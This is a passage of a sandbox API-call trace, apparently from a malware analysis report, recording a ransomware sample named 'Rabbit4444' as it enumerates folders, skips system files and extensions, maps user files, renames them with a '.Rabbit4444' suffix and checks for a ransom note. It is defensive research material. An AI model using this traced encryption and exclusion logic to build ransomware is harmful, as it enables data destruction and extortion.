lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData" [0064.134] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\" [0064.134] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0064.134] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.135] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.137] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.138] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.138] CloseHandle (hObject=0x2cc) returned 1 [0064.139] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData") returned 90 [0064.139] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.139] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef547375, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xef547375, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef8dc0dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.139] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.139] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.139] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.139] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.139] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef547375, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xef547375, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef8dc0dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.139] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.139] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.139] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.139] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.139] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.139] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef8dc0dd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef8dc0dd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef8dc0dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.139] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.139] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.139] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef8dc0dd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef8dc0dd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef8dc0dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.139] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.139] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.139] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.140] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.140] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.141] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.141] CloseHandle (hObject=0x2a0) returned 1 [0064.141] CloseHandle (hObject=0x2cc) returned 1 [0064.141] GetCurrentThreadId () returned 0xd98 [0064.141] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0064.141] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings" [0064.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123f70 | out: hHeap=0xe0000) returned 1 [0064.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0064.141] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings" [0064.141] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\" [0064.141] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0064.141] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.146] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.150] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.151] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.151] CloseHandle (hObject=0x2cc) returned 1 [0064.152] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings") returned 85 [0064.152] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.152] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef8dc0dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.152] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.152] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.152] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.152] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.152] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef8dc0dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.152] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.152] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.152] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.152] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef8dc0dd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef8dc0dd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef90225e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.152] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x19c9ca37, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x19c9ca37, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0064.152] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0064.153] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0064.153] lstrcpyW (in: lpString1=0x130ebe4, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0064.153] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0064.153] lstrlenW (lpString="roaming.lock") returned 12 [0064.153] lstrlenW (lpString="Rabbit4444") returned 10 [0064.153] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0064.153] lstrlenW (lpString=".dll") returned 4 [0064.153] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0064.153] lstrlenW (lpString=".lnk") returned 4 [0064.153] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0064.153] lstrlenW (lpString=".ini") returned 4 [0064.154] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0064.154] lstrlenW (lpString=".sys") returned 4 [0064.154] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0064.154] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19c9ca37, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef547375, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0064.154] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0064.154] lstrcpyW (in: lpString1=0x130ebe4, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0064.154] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0064.154] lstrlenW (lpString="settings.dat") returned 12 [0064.154] lstrlenW (lpString="Rabbit4444") returned 10 [0064.154] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0064.154] lstrlenW (lpString=".dll") returned 4 [0064.154] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0064.154] lstrlenW (lpString=".lnk") returned 4 [0064.154] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0064.154] lstrlenW (lpString=".ini") returned 4 [0064.154] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0064.155] lstrlenW (lpString=".sys") returned 4 [0064.155] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0064.155] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.155] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.155] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15546566927) returned 1 [0064.155] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0064.155] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0064.155] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0064.155] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0064.156] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0064.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0064.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0064.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0064.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0064.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0064.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0064.159] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15546935410) returned 1 [0064.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0064.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0064.159] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.159] CloseHandle (hObject=0x27c) returned 1 [0064.159] CloseHandle (hObject=0x2a0) returned 1 [0064.159] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 109 [0064.159] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0064.160] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfa728eb2, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0xfa728eb2, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0xfa728eb2, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0064.160] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0064.160] lstrcpyW (in: lpString1=0x130ebe4, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0064.160] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0064.161] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0064.162] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0064.162] lstrlenW (lpString="Rabbit4444") returned 10 [0064.162] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0064.162] lstrlenW (lpString=".dll") returned 4 [0064.162] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0064.162] lstrlenW (lpString=".lnk") returned 4 [0064.162] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0064.162] lstrlenW (lpString=".ini") returned 4 [0064.162] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0064.162] lstrlenW (lpString=".sys") returned 4 [0064.162] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0064.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.162] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.162] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15547297904) returned 1 [0064.162] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0064.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0064.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0064.162] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0064.164] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0064.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0064.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0064.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0064.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0064.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0064.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0064.166] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 